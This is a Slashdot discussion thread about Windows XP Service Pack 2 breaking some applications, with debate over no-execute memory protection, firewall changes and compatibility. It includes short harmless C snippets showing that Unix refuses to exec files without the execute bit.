If you every recieve a hotfix from MS, try opening the package in WinZip or similar and if it is full of ".p" files instead of 'real' files then it is an IPD package. It's mentioned here:

You Cannot View or Extract the Updated Files from a Windows Product Update Package

MS also support 'Express Installs' so that the system is smart enough to only download the files you need for to update and not just everything in a particular fix. That is, if you've already got a newer version of a file from elsewhere, then it is not downloaded, even if the fix you're downloading would normally update it.

Brrr, it's cold down here...

[spinkham]

"Microsoft has made something of a trade-off with the update, focusing on security improvements at the expense of backward compatibility."

Just got back from Hell. It's darn cold down there...

Disable the HTML e-mail feature that I don't use!

[at2000]

We have been waiting this for over 5 years!

The plain text mode feature of Outlook Express provides users with the option to render incoming mail messages in plain text instead of HTML. When Outlook Express is running in plain text mode, the rich edit control is used instead of the MSHTML control. You avoid some security issues that result from the use of MSHTML by using the rich edit control."

Re:Pain in the ass, but a step in the right direct

[AndroidCat]

It's not just backwards compatability that's been a problem. A lot of new features for IE/Outlook/Internet have been shoveled on top a basically secure OS core without any thought about security. I hope this means that security people at Microsoft have some power now; so that the next time some marketoid in clown pants says something like "Let's make email auto-executable by preview!", they can shoot him right away rather than slowly removing the feature over years.

Re:Memory protection only on 64-bit platforms for

[AdamInParadise]

Microsoft isn't yet marking memory nonexcutable by default on the good old x86 processors that we all use.


That's good, cause you can't do that, you know. The non-executable bit on memory pages is not supported by the x86 architecture, unlike pretty much any other architecture. This was only fixed in 64 bit offerings.

Re:.NET framework

[mangu]

I agree with you about MFC being retarded, but the true solution to that is using Qt for local apps, and PHP for network apps. I have got junior programmers, fresh from school who had never used either, to create applications in PHP and in Qt in a half-hour, two or three months to full productivity.

not touching a thing

I updated my laptop, which still has the "Designed for Windows XP" sticker on the thing and I lost my sound and periodic access to my cdrom. I'm not touching SP2!

Well....

[headqtrs]

as long as they don't break, I am ok with it.

What kind of moron...

installs a major service pack the night before his midterm is due? Shouldn't he be, ya know, working on the term paper?

Re:What kind of moron...

[AndroidCat]

The kind of moron who needs an excuse for why his midterm wasn't ready? :^P

These changes...

[Trillan]

I'm no Microsoft fan, in fact quite the opposite.

But by and large, these look like common sense changes that will likely cause a great deal less trouble than the move from 2000 to XP did for application vendors.

Tidbit from OSR - XP SP2 will break some drivers

[OmniGeek]

These folks write and consult and teach about Windows drivers. I've followed their newsletter ever since I had to write an NT kernel driver for some custom I/O hardware, in case I ever needed to do another one (blechh!).

According to their newsletter at www.osronline.com, XP SP2 will include mandatory runtime memory pool overrun checking for all drivers. While this will improve the OS' security, it will ALSO cause mysterious failures on upgraded systems due to poorly-written legacy XP drivers. I make no judgements as to the wisdom of this course, but it's definitely worth knowing about beforehand. Of course, if they'd done this FROM THE START, then there would be no failures from it with the upgrade...

in order to run this program, download gnome

how many frameworks (libraries) does linux have?'
hypocrite.

Re:Disable the HTML e-mail feature that I don't us

uhm the plain text mode for OE was featured in XP SP1 and before that was a "security update" patch to OE

good to see you are running a up-to-date patched machine

Re:.NET framework

[jimbolaya]

That problem is that .NET is a moving target; i.e., new versions will come out during those 2-4 years. So downloads will still be required. Let's continue to use Java as an analogy. Java is approaching a decade since it's introduction, and yet its adoption on the desktop is still very limited. More and more people have downloaded the JVM (mostly developers, unfortunately), but with each new release of Java, the prior downloads become largely irrelevant.

The difference, of course, is that Microsoft, with control of the OS, can more easily get .NET into the hands of the average user, than can Sun.

Re:Memory protection only on 64-bit platforms for

FYI reading what MS has written for the programmers, it seems that what you have done is not enough and that you have to manually allocate the block of memory with the VirtualAlloc (I quote: "applications cannot execute from the default process heap or the stack").

Yeah but...

[Anti_Climax]

...Will it break KaZaa?

Imagine the other headline

[spideyct]

You have to bag on MS for this?
Ok, imagine this alternate Slashdot headline:

MS sales buries secure XP
Itoldyouso writes - A leaked memo indicates that the Microsoft developers created a much more secure version of their flagship operating system. However, because it would have caused problems with a small number of applications that were designed insecurely, the Sales & Marketing teams vetoed the new secure version, in an attempt to avoid a customer backlash. It is now official - Microsoft's commitment to trustworthy computing is a complete joke.

I have a feeling that post would rile a lot more people here.

Re:Imagine the other headline

[drooling-dog]

You're probably right about the hypothetical headline, but the problem - as others here have pointed out - is a fundamental one with closed-source software. Whenever compatibility is broken, users are forced to upgrade apps to restore compatibility with the OS. Since users are unable to do this themselves, vendors can (and do) exploit it as a revenue opportunity. It is also a drag on the development of the OS, because Microsoft is forced to kludge back-compatibility in order to make new Windows versions acceptable to customers with irreplaceable legacy software.

In the Open Source world you can just recompile, or download new binaries from someone who's done it for you. I've been running Linux for something like 10 years now. Upgrading has never slowed me down for more than a day or so, and I have never lost the use of any software that I needed or wanted to continue using.

Re:Memory protection only on 64-bit platforms for

[Eponymous+Cowboy]

The non-executable bit on memory pages is not supported by the x86 architecture

Wrong. Get your facts straight.

Bit 43 of the x86 segment descriptor table specifies whether a memory segment is executable.

Attempting to assign CS to a nonexecutable (read/write data) segment, i.e. attempting to execute code in a segment not specifically marked as executable, generates an exception. (See also this presentation for an overview of this and many other x86 security features, most of which are, admittedly, ignored by both Windows and Linux.)

And, by the way, this feature has been around since protected mode was introduced on the 80386. That was in 1985, almost 20 years ago.

Re:Pain in the ass, but a step in the right direct

Much of Windows' excess complexity and security deficiencies can be directly attributed to compromises made for the sake of compatibility with old applications.

Bullcrap! Some of Windows' excess complexity and security deficiencies can be attributed to compatibility issues, but most can be attributed to bad design decisions made early in the process for the sake of customer lockin and market domination.

Re:.NET framework

[Slack3r78]

How is this all that different from having to install, say, DirectX to play a game?

why bother

[rkoot]

This isn't really news.
Every collection of interoperating software will suffer from these so-called 'updates','service packs' or whatever.
A lot of software depends on known bugs/'undocumented features' in underlying software. Fix the bugs (features) and the software will cease to run.
Of course we all like to laugh at M$, but it's not better in unixland.
I could be wrong here, but this is solely based on my experience with various platforms. When it's update-time, they all suck and suffer from the same problems.

r.
-- mod me down ! mod me down ! infinite karma !

Excellent

[0x0d0a]

I was guessing that this was execution-blocked stacks, but couldn't be sure from the description.

This is good news.

OpenBSD, Fedora Core 1 (and presumably above), and now Windows XP SP2 and above all block stack execution. It's definitely a positive move from a security standpoint.

Re:These are a few insecure programs that won't wo

the logical thing would be that it smashes IE into oblivion.

and that would be the biggest security enhancement of all!

Sort of

[0x0d0a]

I agree that Microsoft did the right thing here.

However, it'd be a tough argument to say that these apps were already broken. I'm unaware of anything in Win32 or Windows specs that says that an executable stack may not be assumed. For a couple of types of application (like interpreters) it makes a lot of sense.

Ultimately, it would be best if C simply wasn't such a broadly used application language.

Re:Sort of

[Neillparatzo]

Executable stack could be a hard argument, but at least for memory protection options as well as PE section permission flags (only .text is marked executable by default), it's pretty clearly spelled out what each flag means. Just "the implementation of this protection varies with the processor," or in other words, it hasn't been universally enforced.

And I'm guessing that a lot of the apps that break aren't actually executing things off the stack.

I agree about C, though. There are runtime-checking C variants, but I don't think they're very popular.

Re:Sort of

[Tony+Hoyle]

OK for interpreters...

But Mozilla? Digiguide?

Both of these apps break due to NX on SP2...

Re:Sort of

Perhaps they shouldn't have been so badly programmed then? God knows that Mozilla in all it's variants, even Firefox, is a bloated piece of shit...

Re:These are a few insecure programs that won't wo

[i_hate_ms]

i think the change in SP2 that is being talked about is the use of the NX bit. This bit tells the OS if a certain mem location contains executabel code or not. Making bufferoverflows harder to exploit. But this can only be used if the chip suports it, and currently the AMD x86-64 are the only ones that do.

so unles you have a opteron you cant detect any issues resulting from the use of the NX bit

for any one interested there is a realy good thred about this topic at aceshardware.com

No kidding!

[Chris+Burke]

NX bit may not be a panacea, but it's still very useful. There's a reason OpenBSD is trying to support it. Is it supported in Linux yet? And if not, why not? "Don't allow this to execute" is a basic permission, like read-only, that should have been in the VM system from day 1 -- and I think it was, in many other architectures.

And yes, I do think you'd find a shitstorm on /. if MS didn't release this.

Re:No kidding!

[Nevo]

Well, part of the problem is that the Pentium chips don't have a "no execute" flag for memory pages.

Until the hardware supports the feature, it's useless.

compiler makers take note!

don't you get that nagging feeling that bounds checking ought to be done automatically in the compiler? or at least with a simple directive...

Re:compiler makers take note!

[HFXPro]

How would you bounds check with the compiler? That would be a determanistic operation to figure out if a number wraps around in that particular case (means the code has to be executed). It would still be up to the program to make sure the number wouldn't wrap around. So this would be more of runtime information to be tested and the programmer would have to tell it if he wants the wrap around behavior or not. I suppose he could use one of the Lisp languages whos numbers are not dependant on machine word size.

Good for all sortsa reasons

[rben]

This change is good for all kinds of reasons:

1. Security is increasingly important. It's about time that Microsoft bit the bullet and made the necessary changes to increase the security of the OS that runs on most desktops.
2. The problems caused by this change might finally start to demonstrate to IT managers just how much more costly security changes in Windows are than similar changes in Linux. (Provided we teach them that recompiling applications in Linux is a fairly easy task, or better yet, make recompiling applications in Linux even easier.)
3. If Microsoft follows it's usual behavior pattern, it will break a few other competitors programs just because it can, further demonstrating the anticompetitive business practices of this monopoly.
4. More businesses will start to think seriously about switching to Linux.

I think we'll all profit in the end from this service pack... well, maybe not Microsoft, but oh well.

Re:Good for all sortsa reasons

[JKR]

Provided we teach them that recompiling applications in Linux is a fairly easy task, or better yet, make recompiling applications in Linux even easier

What? EVEN easier? How is recompiling things "easy" in Linux? Most end users don't have a clue what to do with a compiler for EITHER architecture; expecting granny to rebuild & relink her apps is not going to happen. Hell, I'm a professional software developer with 10+ years experience of both Linux and Windows, and I just wasted a weekend trying to rebuild Kerberos on Linux because of symbol versioning problems. This is EASY?

From a developer point of view, the hard work in this sort of change is TESTING, not COMPILING. And precious little of that gets done by developers on EITHER side of the FOSS fence.

Jon.

Good Job

[RoadkillBunny]

I realy like the way they are heading in the developing way. They are acctualy taking their users' security seriosly since they have a real threat now (Linux). But this dosn't mean that I will start using XP. They might be good at programming, but their marketing sucks. I am not gonna pay $200+ for a empty shell and then $40-$200 for another application. Anyway, good job M$!

Apple Panther 10.3

[LoudMusic]

In similar news, I've begun upgrading computers at work to OS X 10.3 and found things like AppleScripts I have made suddenly don't work anymore. WTF!? And various other installers (presumably using AppleScript) don't function either.

I'm all about progress and out with the old but ditching last year's technology is a bit quick.

Re:Apple Panther 10.3

[phillymjs]

You should expect some things to break in a major version upgrade. You're forgetting that even though Apple called the versions 10.0, 10.1, 10.2, and 10.3, they are more like OS X beta, OS X 1.0, 2.0, and 3.0... the changes that are going on are more analagous to a Win95->Win98 type thing than, say, OS 8.5->8.6.

OS X best practices right now, according to me:
-Keep production machines to the previous generation of OS X from what's current.
-Don't upgrade to the current version until it's had at least three major updates (not necessarily 10.x.3).
-Research your planned upgrades extremely thoroughly and test, test, test.
-Roll out the upgrades to only one person at first, and let them pound on your build for a week or two to see if any upgrade deal-breakers shake loose.
-Once the deal-breakers have fixes and/or workarounds applied, roll out to everyone else.

Only one of my clients ignored my advice and went to Panther en masse before 10.3.2 was even out, and they paid the price in lost productivity when they discovered that some stuff they needed didn't play nice with it. Everyone else is listening to me and sticking with 10.2.8 for now.

Hopefully by OS X 10.4 or 10.5, things will have settled down sufficiently for us to go back to the old ways of just upgrading with few to no worries, but at the current time OS X is still in a state of flux that makes this too risky in a production environment.

~Philly

Re:Apple Panther 10.3

[phillymjs]

the changes that are going on are more analagous to a Win95->Win98

Oops, that should be "Win3.11->Win95."

~Philly

Strange.....

[azuroff]

The address still says slashdot.org, but there is approval of something Microsoft has done...

"There is nothing wrong with your browser. Do not adjust the site. WE control the comments, we control the moderators...."

SP2 can be uninstalled easily

[Punchinello]

Windows XP SP2 can be uninstalled. If it f*cks up anything you just go to add/remove programs and get rid of it.

There goes your excuse for missing your midterm paper deadline.

Re:Disable the HTML e-mail feature that I don't us

try mozilla.

Memory Protection means...

[bgarrett]

"Hey, that's an awfully full heap ya's gots there, pally... be a shame if anything were to... HAPPEN to it."

Seriously, this is a good step they're taking. Instead of the same old "we take it up the ass for backwards compatibility" drill, fixing core parts of the OS is important. If an app breaks, so be it. They've announced this well in advance. No dev has an excuse not to know about it by the zero hour.

Re:.NET framework

[darkain]

the problem with java tho, is the user-interface.. java alienated themselves with lack of enhancments to their user interface on an os-specific level. lets see a *decent* 3d game made in java, and i dont mean something that looks like the original wolfenstien or doom.

Good for business, too.

You gotta admit that forcing Windows customers to have to re-purchase all their existing software all over again, is good for the software business in the long run. Sure they will grumble for a while, even threaten to switch software brands or platforms in retailiation, but in the end, they are hooked just like heroin addicts, and *will* pony up the dollars because they really have no other viable choice on this planet. Squeeze your customers until they cry 'uncle' and make sure they know who the boss is and keep reminding them of that fact periodically. Remember the old saying, "The customer is always right"??? Bwahahahaha, shyeah right. People who believe that are living in fantasy-land -- this is now the 21st century, after all. Business is war.

Not sure what "bagged" means...

[Azureflare]

Sorry if I offended you. I was just using the words of the grandparent poster. Looking over it again, I'm guessing "bagged" means that Microsoft should not release this SP2? Correct me if I'm wrong. I should have probably used my own words rather than using "bagged" from the original poster...

Yeah, I agree, that would be quite unreasonable to expect Microsoft to not release this service pack. I hope it is apparent in my post that I don't think MS should shut this SP out; I just think it'll cause a lot of headaches, and I really hope they have an option to turn it off! (I.e. turn off the new security protections).

Re:Not sure what "bagged" means...

[oconnorcjo]

I hope it is apparent in my post that I don't think MS should shut this SP out; I just think it'll cause a lot of headaches, and I really hope they have an option to turn it off! (I.e. turn off the new security protections).

I think they should release it as Windows XP SE. Anytime an operating system breaks compatibility, it should be released as a new edition. That way, people can continue to use XP without having to wiegh the importance of compatibility vs. patches/security. Windows XP SE would give the consumer a more secure OS as an upgrade path. I am surprised MS didn't just do that- hell, they could have made it profitable for themselves.

Re:Memory protection only on 64-bit platforms for

[Athanasius]

AIUI the problem is that this relies on you using segmented memory rather than whatever alternative model it is Linux et al use, right ?

So, you can do it on x86, but all current OSes have chosen not to use segmented memory for other reasons (I believe performance is a big one).

This is the no-exec stack.

This appears to be the same "no-exec stack" idea that OpenBSD came up with some time ago.

My question is, does Windows have an equivalent to the "mprotect()" call that can be used to override this, for, say, a Just-In-Time like Java or .NET?

Reading between the lines

[PerlPo8]

If developers do find that SP2 breaks their applications, it most likely means that they were not following best practices in terms of security when writing their applications, according to Goodhew...Microsoft's Visual Studio .Net is one of the applications affected by Windows XP SP2

Hmmmmm...

Few Application HAVE to be run as admin

[temojen]

Some stupid developers (including Canada Customs & Revenue Agency's contractor who did the "tables on disk") put their data files in the "Program Files" subtree, and don't set any acls to allow anyone other than admin access.

One method I've used to get around this is logging in as a normal user, watching for what files it can't write, logging in as admin, setting the acls (with "cacls") to allow access to that file, log in as normal user again, run the program again, etc.

Sure, it's slow, but some programs you just need (like TOD), while others really should say "must be run as admin" on the box so we know to avoid them (like Quicken).

Interestingly, Tables on Disk (which is used to calculate payrol deductions) is a java program, but is only provided as windows & mac self-extracting installer. If they provided a zipped version, we wouldn't need any closed-source OS machines where I work.

Re:Few Application HAVE to be run as admin

[myowntrueself]

I never run games with admin privileges and I play a fair few games.

What I do is create a group (gamers) add it to my limited account and give this group full control of the games directories and associated registry keys.

This works on almost every game, so far with the exception of 'aliens vs predator 2' which totally refuses to cooperate; it complains 'no disc in drive'.

I think theres a bug in their copy protection implementation (civ3 conquests uses the same copy protection, but its fine).

Anyway, the workaround for this is to (ouch) download a cracked version wich copy protection turned off.

But thats just crazy; you have to run the cracked app as admin to install it. Do I trust it? Hell no. Not really.

But if I want to play the game I bought and not have to log in as admin to do it, thats preferable in my view. I am *not* going to surf the net and read email with admin privileges.

Oh and power user? Forget it; this group has write access to system folders and is almost as dangerous as administrator.

Re:Few Application HAVE to be run as admin

Interestingly, Tables on Disk (which is used to calculate payrol deductions) is a java program, but is only provided as windows & mac self-extracting installer. If they provided a zipped version, we wouldn't need any closed-source OS machines where I work.

Can't you collect the files from a mac or windows system and make an archive?

Brilliant Idea

[polyp2000]

seems like a great way to give people a longhorn

The price of security

[pehrs]

Frankly I can't see why anybody is whining over this, unless it's the instinctive MS bashing of Slashdot.

They are adding a security feature that will improve the overall security of the operating system at the cost of breaking older, insecure, applications. This is done everywhere and for some odd reason it's usually considered a good thing.

I am looking forward to this, any my question is only when this kind of features can be implemented in linux to improve the security here too... (Or is it perhaps in there allready?)

Re:Disable the HTML e-mail feature that I don't us

[polyp2000]

Why have you been waiting 5 yrs ? there have been plenty of Email clients around for years that have that function, it seems pretty barmy to use a software program that doesnt meet your requirements!

The K in KDE...

...stands for Krap

and that is why MS is successful...

You don't gain new customers by inconveniencing your current ones. Companies don't buy computers as temples of virtuous computing. They buy them because the computer can be used as a tool to make them money.

As such, they aren't interested in MS breaking their applications just because "it's the right thing to do".

Compatibility should always be of prime importance. You clearly can argue that compatibility is useless if your machine is infected with viruses, so at times you might have to sacrifice some of it.

But this idea of breaking compatibility just to force everyone to clean up their act is foolish. As long as Linux doesn't understand the value of binary compatibility, there won't be much of a threat to MS on the desktop.

The Emperor has no clothes

[the_skywise]

My Norton Internet Security currently interferes with my Visual Studio .NET remote debugging. So I can disable it while debugging or I can configure NIS to track when the program is running and let it use those ports.

Now MS says, with their new firewall, I don't *have* that option? Now anybody who wants to write an app to use a port must first notify MS that it wants to use that port.

Doesn't this mean that malicious programs will just quietly open up firewall ports on their own without notifying the user?

Secondly, what does this mean:

"Another product that Microsoft needs to update is the .Net Framework. The new memory protection features in SP2 require developers of certain applications to mark their code with memory execution permissions. If they don't, the protection features could interfere with the application, according to Microsoft.

"The great bulk of applications will not be affected by memory protection. The number one that leaps to mind is execution environments with just-in-time code generation. The .Net Framework is one," Goodhew said. "

Translation:
Mostly only unmanaged C++ programmers will be affected by these security changes. If you had just programmed the Microsoft way to begin with and used .NET like we told you, you won't be affected. (But .NET apps are going to have to be modified to switch on memory protection)

Memory protection only occurs on NEW processors. The vast majority of the world runs Windows on NON-SECURE processors.

Stranger still, Microsoft has had buffer overrun checking BUILT IN to Visual Studio .NET. (Which, last I checked, was the only way to make .NET objects that run on Windows). Without that flag turned on, the .NET object is marked UNSECURE.

Lastly, Microsoft's greatest security problems are not buffer overruns or firewall holes. They're AUTOMATIC ACTIVEX control installation from malicious pop ups to install spyware. They're wide open access to the email address box and a by-default scripting system that allows malicious emails to respawn themselves. They're bugs in the Internet Explorer control that allow malicious URL's.

NONE of these "security innovations" even take a crack at stopping those!

What DO these security innovations do?

Destroy a previously lucrative software market for antivirus tools.

Take the firewall OUT OF THE CONTROL of the user and put it firmly inside the OS to determine what's good for you. (Remember DRM? Isn't it interesting that the main thing broken from this portion of the update are peer-to-peer apps and FTP sharing?)

Further entrench .NET into the programming paradigm and making Microsoft Programming Languages THE programming languages. (Programmer mindshare... if you're busy keeping up with Microsoft, you're not programming for something else or making reusable code to port to other platforms.)

I'm all for security, and now these boxes will be secure... But no moreso than the typical user installation out there today that uses a third party antivirus/firewall solution and keeps their system up to date with the latest patches.

This is about as effective at what MS did with Outlook XP and *by default* turning off the ability to get attachments out of your email. You had to setup a profile configuration OR edit your registry settings to get that feature back.

Y'know, there comes a point where you have to say, I can ride my bicycle without training wheels.

I understand that MS is fighting a bad PR image. But if this is how Microsoft "innovates"... Well, might as well just have lightweight users use Macs (which will hold their hands) and pro users/developers can use Linux.

Re:The Emperor has no clothes

[Daltorak]

You, sir, have not done your research. While this is typical of a ranting & raving slashdotter, it also spreads lies and misinformation.

First of all, Microsoft has published a document titled How to Enable Remote Debugging on Windows XP Service Pack 2.

Second, one of the features being added to Internet Explorer with SP2, is a lot of additional flexibility in controlling ActiveX behaviour. You can get a list of all the components that have been installed, and selectively remove them. You can also force IE to always disallow controls from a particular company, if you don't trust them (good for Gator, etc.)

Third, the firewall itself gives the user far more control and feedback than it used to have. You can read about the changes in more detail on this webpage. I'll bet you didn't know that you can control the new Windows Firewall from the command-line! How is this taking control away from the user? BTW, the reason applications like FTP and P2P are breaking, is because they make use of ports in strange and unconventional ways. Lots of firewalls have problems with this.

Fourth, Outlook XP didn't remove the ability to view attachments; they merely implemented a list of extensions which would be blocked by default. That's saved a lot of people from being infected by some of the viruses that have come around in the last couple of years... most of the time, the people who DO get infected are people who don't believe in upgrading their software and applying the latest Windows Updates.

Re:The Emperor has no clothes

[mydn]

[quote]Visual Studio .NET. (Which, last I checked, was the only way to make .NET objects that run on Windows[/quote] You don't need Visual Studio .NET to build .NET applications. You can use Notepad and csc.exe if you like. Or one of the free IDE tools, like WebMatrix or SharpDevelop.

Re:.NET framework

Call it the runtime or CLR then.

Not as lame as "mono"

Congratulations to MS

[Craig+Ringer]

Finially, they're biting the bullet and doing the right thing. A sensibly configured default firewall - it's one of the things they should've been doing for years. The memory protection is also interesting - and probably a good move, so long as developers don't start using it as a crutch.

Now, if we see built-in virus protection, tainting or sandboxing of executable code recieved by email, proper MIME handling, and flagging of double extensions, AND AUTOMATIC UPDATES THAT ARE ON BY DEFAULT, it'll be mostly there.

Even forcing users to take an extra step (like the 'chmod u+x' required on *NIX) to make emailed and downloaded files executable would help a _lot_. Sure, viri would just start saying "click properties, then tick 'executable'" in the messages; but it'd stop a lot of the worst offenders from viewing things without thinking.

Re:Congratulations to MS

[spitzak]

extra step (like the 'chmod u+x' required on *NIX)

Hey I like Unix and dislike Windows, but this is a bit of Linux-fud. This is not some amazing "security feature" invented by K&R in 1970. Here are the facts:

1. A program can call "exec" on any file, whether or not it has the execute bit set. The system does not check, so this is not any real protection. Imagine a "Linux Outlook" written without any assumptions about security, the MS-style author of the program would certainly make it so that clicking on an executable would call exec or popen. The main security in Linux is that the email program writers never considered that somebody would want to run a program, they either save it as a file or open it as text. But considering that Microsoft went through the trouble of actually interpreting the attachement as a .exe and locating the icon resource and displaying it, it is obvious that such thinking does occur to programmers and could easily have happened on Linux.

2. Any program with permission to write the file can turn on the execute bit. For instance tar will restore the execute bits back on the tar'd files. A "user friendly" program would certainly turn on the bit on received files that indicated they want it, since that is what the user wants.

3. The real purpose of the execute bit:

When Unix was written in 1970, a powerful machine had 64K of memory and disks spun at a few hundred rpm. In addition the original design assummed executable programs and data files would be mixed together in the same directories. Especially the current directory: the idea that putting "." somewhere other than the start of the path for security did not occur till maybe 1980 (and it is still missing from Windows CMD.EXE!) Besides the current directory people would often modify their path to include their friend's home directories (to get their programs) or to get different versions of programs.

On such machines it would take many seconds to try to open a given file in each of several directories on the path. The only way to make a command run efficiently would be to store a hash table in memory saying which directory was the first on the path that each command was in (the command "rehash" in csh shells would recalculate this).

In the directory structure people were using then, over half the files on the path would not be executable and thus not commands. The rehash command could greatly reduce memory usage if it could eliminate these right away. The correct solution (opening the files and checking for magic execute bytes) would be far too slow. So they decided to dirty up the file system by adding a single "attribute" in the form of the execute bit, so the rehash could skip files quickly.

That is why the execute bit is there. It is not a security feature.

Re:Congratulations to MS

[Permission+Denied]

1. A program can call "exec" on any file, whether or not it has the execute bit set. The system does not check, so this is not any real protection.

Where the hell are you making this up? This is blatantly false. I've never seen any Unix system where this is true, and I've seen lots of Unix systems.

Try it:

% cat test.c
#include <unistd.h>
#include <errno.h>

int main()
{
execl("./foo", "./foo", NULL);
perror("exec");
return 1;
}
% ls -l foo
-rw-rw-r-- 1 xxxxxxxx xxx 11926 Mar 6 16:07 foo
% ./test
exec: Permission denied

I justed tested this on Linux 2.4, FreeBSD-STABLE, OpenBSD 3.4, Solaris 8 and even SunOS 4.1 which is over ten years old. You can verify for yourself that this check is not in libc's execl but in the kernel.

Now the execute bit isn't end-all protection. I could, for instance, read in the file, parse the ELF sections, load them up and run the code. On Linux, you can do "/lib/ld-linux.so.2 foo" where "foo" is 644 and it will be executed. There are ways to get around chmod -x if you want to but it would be extremely unlikely that you would by accident execute a program marked non-executable.

Re:Congratulations to MS

[AtrN]

1. A program can call "exec" on any file, whether or not it has the execute bit set. The system does not check...,

Unix V7, /usr/src/sys/sys/sys1.c, in exece() (pls. excuse friggin' indent lossage).

if(access(ip, IEXEC))
goto bad;

Re:Congratulations to MS

[stefanb]

A program can call "exec" on any file

Bullshit:

$ cat exec.c
#include <stdio.h>
#include <unistd.h>
#include <sysexits.h>

int
main(int argc, char *argv[])
{
if(argc <= 1)
{
fprintf(stderr,"Need to specify a file to execute.\n");
return EX_USAGE;
}
if (execve(argv[1],argv+1,NULL) <= 0)
{
perror("execve() failed");
}
}
$ make
cc exec.c -o exec
$ echo '#!/bin/sh' >foo
$ ./exec foo
execve() failed: Permission denied

(Slashcode loses the tabs/nbsps.)

Re:Congratulations to MS

[Mr.+Hankey]

The executable bit may not have been intended as a security feature, but sometimes things get used in ways that they weren't intended. The current set of email clients under *nix, even those that attempt to emulate the Outlook interface for whatever reason, do not play cowboy and automatically execute attached applications when you click on them. They don't set the executable bit on every file that you download either. The average email client author knows that this isn't safe behavior. It should be the user in the end that determines which files are executable, not the email client.

As a recent example, someone at work accidentally clicked an attachment containing a new virus that his AV software didn't detect, despite his initial impression that the email wasn't from the sender. You might say that he shouldn't have clicked on it to begin with, and I'd agree. If the system had not executed the attachment automatically though, he wouldn't have been infected. I think the best analogy is seatbelts and airbags. You never set out to get in an accident, but it's certainly nice to have that extra layer of protection if it happens.

FWIW, I think that MS is doing a great thing here. I'm no fan of their software, especially that damned corruptible, binary, single-point-of-failure registry. It does appear that they have actually pulled their head out of the sand and started securing their code though. It isn't going to be enough to make me want use their products on my system, as there are other reasons I prefer Linux that are incompabible with MS' business model. It may however make my life easier at work where it is used on some systems, and give me fewer reasons to curse their name in general.

Re:Congratulations to MS

[Old+Wolf]

Perhaps that is what it was originally. Nowadays, it is a security feature.

Re:Congratulations to MS

[Barto]

Automatic updates are on by default in Windows XP. What drugs are you on and where can I get some?

Barto

Re:Congratulations to MS

[Craig+Ringer]

They were turned on in SP1, then, yes?

If memory serves...

[temojen]

You cannot not use segmented memory on a 386+ cpu. But segmentation does not jibe with the UNIX process model, so the Code, Data, Stack, Extra, File, and Global segments are set to 0x00000000-0xffffffff. It's not for performance; it's for simplicity and (source-level) compatibility with Paged-only architectures.

A free UNIX-Like OS could use the segmentation model to prevent heap or stack execution, but it might require changes to GCC to make sure it's referencing the right segment (because CS:0000abfe is no longer the same as DS:0000abfe). You'd then have to to re-compile every library and executable on the system. It would also break any code that produces self-modifying, or jit compiled code (but probably not non-jit VM interpreters like PHP, Python, Perl, Ruby, etc.

Re:If memory serves...

You cannot not use segmented memory on a 386+ cpu.

Bullshit. Otherwise DOS wouldn't run on your Pentium.

Re:If memory serves...

[temojen]

DOS uses segmented memory.

Read chapter 7 of Microsoft's 80386/80486 Programming Guide by Ross P Nelson, 1991 to learn about it.

Re:If memory serves...

DOS has a horrendous memory model, though, which is kinda the point. Remember all those loops you had to jump through to get a decent amount of memory to work with? Small, medium, or large memory model? Flat or segmented? Maybe a few overlays while you're at it? Near or far pointer? Oh, joy.

It's not the flat memory model which is broken, it's the x86's non-support for non-execute in the page tables. Something the x86-64 design corrects.

Re:If memory serves...

Uh...

You said:
You cannot not use segmented memory on a 386+ cpu.

Which I read as:
You can not use segmented memory on a 386+ cpu.

Sorry. Just bad grammer on your part I guess.

Re:If memory serves...

(posting from work, where I don't have my password for slashdot)

I agree, but using a non-flat memory model could be a workaround for those still saddled with (oh the horror!) Athlon XPs and Pentium IVs.

Re:If memory serves...

It's not bad grammer; it's pedantically correct grammer.

Re:If memory serves...

[mabinogi]

it's a poor choice of words.

'cannot avoid using' would be better than 'cannot not use'

It Breaks *.net?

[nurb432]

Great, just great. /doh, should have used PHP instead.

Not to disagree too much...

[dunedan]

but last time I checked there are lots of open source projects that run on windows as well as linux. And there are lots of closed source applications that run on linux.

So if the new 2.6 kernel happens to break the linux versions of ProE or Gaussian 98 or Verilog are Slashdoters going to complain the same way that Linus is evil and irresponsible?

This is old news

[Gary+Destruction]

"Microsoft service pack breaks applications." This is certainly nothing new. Microsoft service packs have had a history of breaking applications. So the real issue here is Microsoft taking more consideration for applications. I mean, for there to be a history of application breaking with service packs, one would think that Microsoft would have done something to help prevent future problems.

Unsecure?

[logicnazi]

Is this a codeword to say that SP2 won't let me rip CDs?

Re:.NET framework

[SlightOverdose]

Ugh. php.

I guess php is a popular language, but it really isn't a good idea for anything more complex than small scripts. It's too difficult to maintain a decent level of abstraction. Java, Zope, and (dare I say it) ASP.NET are much better solutions.

QT is good- but .NET is more than just a widget set. It's an entire class library.

A better paper...

[Insanity]

Another good whitepaper is available here.

This one goes into more detail about the changes from the user perspective rather than the developer one - it's a much better read, and considerably more concise.

*whew*

[bl8n8r]

That's a relief. For a minute there, I thought that read "Windows XP could break some applications". Good thing *that* isn't what it said.

Re:The "unsecure" list: Ans. to Why funny.

[HiThere]

Because people are nervous, and half suspect that necessary or not at least some of the applications on that list will be hit. Because they can, and we can't stop them.

You can laugh, while wincing, or you can rage. Or, I suppose you could meditate and let the world become unimportant. Other options seem to involve lying to oneself, which I consider a worse policy than any of the preceeding ones.

In other news

[Lewis+Daggart]

Studies show that sleeping pills may cause drousyness Well, theres another duh moment :)

DOS isn't done until Lotus won't run

[Moderation+abuser]

Naw. Micrsoft are pillars of society. They would never do a thing like that.

Re:You cannot make an omelet without breaking eggs

[HiThere]

You are trusting what they tell you. If you were to examine their history, you might find this a bit less of a cause to rejoice. Yes, what they are promissing is something good, but...

In threat analysis one examines not what one's enemies/associates are expected to do, but what they can do. This always tends to lead one to a paranoid view of the world. Unfortunately, MS has often followed some of the less scrupulous paths analysed in this manner, so presuming that they won't do so this time may be less than wise.

Might be a slow adaption

As an end-user, I will install a fresh copy of XP into VMWare, install all the apps I use on any of my machines and apply the fixpack.
If anything breaks, I will see if there are updates for my software available at no charge, if not, then I will not adopt the fixpack.

If this fixpack incur additional spendings on my part, then I will not use the fixpack, which means there will be at least a few machines out there "not fully up-to-date", with all the consequences of that in a globally connected environment.

I'd hate to be the "weak link", but if the vendors of my software do not provide free updates, too bad for the rest of you.

Re:Disable the HTML e-mail feature that I don't us

1. Dropdown the Tools menu and select Options.
   
2. Select the Read tab.
   
3. Check the "Read all messages in plain text" check box.
   

Or you could just sit and blame Microsoft for your inability to read their supplied documentation pandering to a community that is as inept and continue to use the product without a clue as to how it works.
